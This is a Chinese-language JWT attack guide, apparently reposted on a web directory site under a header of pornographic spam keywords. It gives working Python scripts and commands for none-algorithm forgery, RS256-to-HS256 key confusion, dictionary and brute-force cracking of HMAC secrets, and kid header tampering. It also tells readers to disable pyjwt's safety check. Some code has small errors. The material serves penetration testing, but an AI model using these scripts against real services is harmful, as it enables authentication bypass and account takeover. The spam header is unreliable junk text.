日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

Json Web Token 2020 攻擊指南

 

最近工作中測試一款客戶端exe程序,web框架基于CEF,認證用的是jwt。說實話jwt這個東西實際運用真的很少,前幾年完整擼過一次,結果這次又碰到了就基本忘光了之前的測試過程和方向,于是又重新學習,在查閱了大量的國內以及國外文獻后,經過大量的代碼編寫以及測試,寫下此篇攻擊指南

可以很負責任的說,目前針對 jwt 攻擊測試的方案

有且僅有以下幾種:

  • 重置空加密算法
  • 非對稱加密向下降級為對稱加密
  • 暴力破解密鑰
  • 篡改 jwt header,kid指定攻擊

JWT 在線解析地址:https://jwt.io/


重置空加密算法

如圖,當前 jwt 指定的 alg 為 HS256 算法

Json Web Token 2020 攻擊指南

 

將其修改為none,然后輸出(如果沒有 jwt 模塊,需要 pip install pyjwt 一下)

import jwt

print(jwt.encode({"userName":"admin","userRoot":1001}, key="", algorithm="none"))
Json Web Token 2020 攻擊指南

 

刪掉最后的 “.” ,然后帶入原有的數據包進行發包測試,看 server 端是否接受 none 算法,從而繞過了算法簽名。


非對稱加密向下降級為對稱加密

現在大多數應用使用的算法方案都采用 RSA 非對稱加密,server 端保存私鑰,用來簽發 jwt,對傳回來的 jwt 使用公鑰解密驗證。

碰到這種情況,我們可以修改 alg 為 HS256 對稱加密算法,然后使用我們可以獲取到的公鑰作為 key 進行簽名加密,這樣一來,當我們將 jwt 傳給 server 端的時候,server 端因為默認使用的是公鑰解密,而算法為修改后的 HS256 對稱加密算法, 所以肯定可以正常解密解析,從而繞過了算法限制。

當 server 端嚴格指定只允許使用 Hmac 或者 RSA 算法其中一種時候,那這種攻擊手段是沒有效果的。

附上降級轉型的 Python 代碼:

import jwt
import sys
import re
import argparse


class HMACAlgorithm(jwt.algorithms.HMACAlgorithm):
    def prepare_key(self, key):
        key = jwt.utils.force_bytes(key)
        return key

jwt.api_jwt._jwt_global_obj._algorithms['HS256'] = 
        HMACAlgorithm(HMACAlgorithm.SHA256)

parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='''Re-sign a JWT with a public key,
        changing its type from RS265 to HS256.''')
parser.add_argument('-j', '--jwt-file', dest='jwt_file',
        default='jwt.txt', metavar='FILE',
        help='''File containing the JWT.''')
parser.add_argument('-k', '--key-file', dest='keyfile',
        default='key.pem', metavar='FILE',
        help='''File containing the public PEM key.''')
parser.add_argument('-a', '--algorithm', dest='algorithm',
        default='RS256', metavar='ALGO',
        help='''Original algorithm of the JWT.''')
parser.add_argument('-n', '--no-vary', dest='no_vary',
        default=False, action='store_true',
        help='''Sign only once with the exact key given.''')
args = parser.parse_args()

with open(args.keyfile, 'r') as f:
    try:
        pubkey = f.read()
    except: 
        sys.exit(2)

with open(args.jwt_file, 'r') as f:
    try:
        token = f.read().translate(None, 'n ')
    except: 
        sys.exit(2)

try:
    jwt.decode(token, pubkey, algorithms=args.algorithm)
except jwt.exceptions.InvalidSignatureError:
    sys.stderr.write('Wrong public key! Aborting.')
    sys.exit(1)
except: 
    pass

claims = jwt.decode(token, verify=False)
headers = jwt.get_unverified_header(token)
del headers['alg']
del headers['typ']

if args.no_vary:
    sys.stdout.write(jwt.encode(claims, pubkey, algorithm='HS256',
                headers=headers).decode('utf-8'))
    sys.exit(0)

lines = pubkey.rstrip('n').split('n')
if len(lines) < 3:
    sys.stderr.write('''Make sure public key is in a PEM format and
            includes header and footer lines!''')
    sys.exit(2)

hdr = pubkey.split('n')[0]
ftr = pubkey.split('n')[-1]
meat = ''.join(pubkey.split('n')[1:-1])

sep = 'n-----------------------------------------------------------------n'
for l in range(len(hdr), len(meat)+1):
    secret = 'n'.join([hdr] + filter(
        None,re.split('(.{%s})' % l, meat)) + [ftr])
    sys.stdout.write(
            '%s--- JWT signed with public key split at lines of length %s: ---%s%s' % 
            (sep, l, sep, jwt.encode(claims, secret, algorithm='HS256',
                headers=headers).decode('utf-8')))
    secret += 'n'
    sys.stdout.write(
            '%s------------- As above, but with a trailing newline: ------------%s%s' % 
            (sep, sep, jwt.encode(claims, secret, algorithm='HS256',
                headers=headers).decode('utf-8')))

注意,因為jwt模塊更新后,防止濫用,加入了強校驗,如果指定算法為 HS256 而提供 RSA 的公鑰作為 key 時會報錯,無法往下執行,需要注釋掉 site-packages/jwt/algorithm.py 中的如下四行:

Json Web Token 2020 攻擊指南

 

再把整個python代碼流程精簡一下,使用以下腳本即可,public.pem 為 RSA 公鑰:

# -*- coding: utf-8 -*-

import jwt

public = open('public.pem', 'r').read()
prin(jwt.encode({"user":"admin","id":1}, key=public, algorithm='HS256'))
Json Web Token 2020 攻擊指南

 


暴力破解密鑰

當 alg 指定 HMAC 類對稱加密算法時,可以進行針對 key 的暴力破解

其核心原理即為 jwt 模塊的 decode 驗證模式,

jwt.decode(jwt_json, verify=True, key='')
  1. 簽名直接校驗失敗,則 key 為有效密鑰;
  2. 因數據部分預定義字段錯誤:
  • jwt.exceptions.ExpiredSignatureError
  • jwt.exceptions.InvalidAudienceError
  • jwt.exceptions.InvalidIssuedAtError
  • jwt.exceptions.InvalidIssuedAtError
  • jwt.exceptions.ImmatureSignatureError導致校驗失敗,說明并非密鑰錯誤導致,則 key 也為有效密鑰;
  1. 因密鑰錯誤jwt.exceptions.InvalidSignatureError導致校驗失敗,則 key 為無效密鑰;
  2. 因其他原因(如,jwt 字符串格式錯誤)導致校驗失敗,無法驗證當前 key 是否有效。

綜上分析,構造字典爆破腳本:

import jwt

jwt_json='eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4iLCJpZCI6MX0.S5iudTeUBkKZa2Ah_MR_JdAsSBUFrnF3kn1FL-Cvsks'
with open('dict.txt',encoding='utf-8') as f:
        for line in f:
            key = line.strip()
            try:
                jwt.decode(jwt_json,verify=True,key=key,algorithm='HS256')
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.InvalidSignatureError):
                print('verify key! -->' + key)
                continue
        else:
            print("key not found!")

運行后可以看到,成功爆破了 key 為 abc123

Json Web Token 2020 攻擊指南

 

如果沒有字典,可以采取暴力遍歷,可以直接使用 npm 安裝 jwt-cracker , 方便快捷

npm install jwt-cracker

使用方法:

> jwt-cracker "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4iLCJpZCI6MX0.S5iudTeUBkKZa2Ah_MR_JdAsSBUFrnF3kn1FL-Cvsks" "abcde0123456" 6
Json Web Token 2020 攻擊指南

 


篡改 jwt header,kid指定攻擊

kid 即為 key ID ,存在于 jwt header 中,是一個可選的字段,用來指定加密算法的密鑰

Json Web Token 2020 攻擊指南

 

如圖,在頭部注入新的 kid 字段,并指定 HS256 算法的 key 為 1,生成新的 jwt_json

jwt.encode({"name":"admin","id":1},key="1",algorithm='HS256',headers={"kid":"1"})
Json Web Token 2020 攻擊指南

 

驗證沒有問題:

Json Web Token 2020 攻擊指南

 

如果 server 端開啟了頭部審查,那么此方法也將沒有效果

另外,可以構造 kid 進行 SQL注入、任意文件讀取、命令執行等攻擊,但是除了 CTF 中會有這種強行弱智寫法,實際案例可以說是并不存在,實用性極其低,故不再贅述。


小結

以上四種攻擊方式可以說是涵蓋了已知所有的針對 jwt 的利用,還有一部分沒有實際用處或者根本就不存在的東西,沒有必要去浪費筆墨,讀者也沒有必要來浪費時間看。

分享到:
標簽:Json Web Token
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定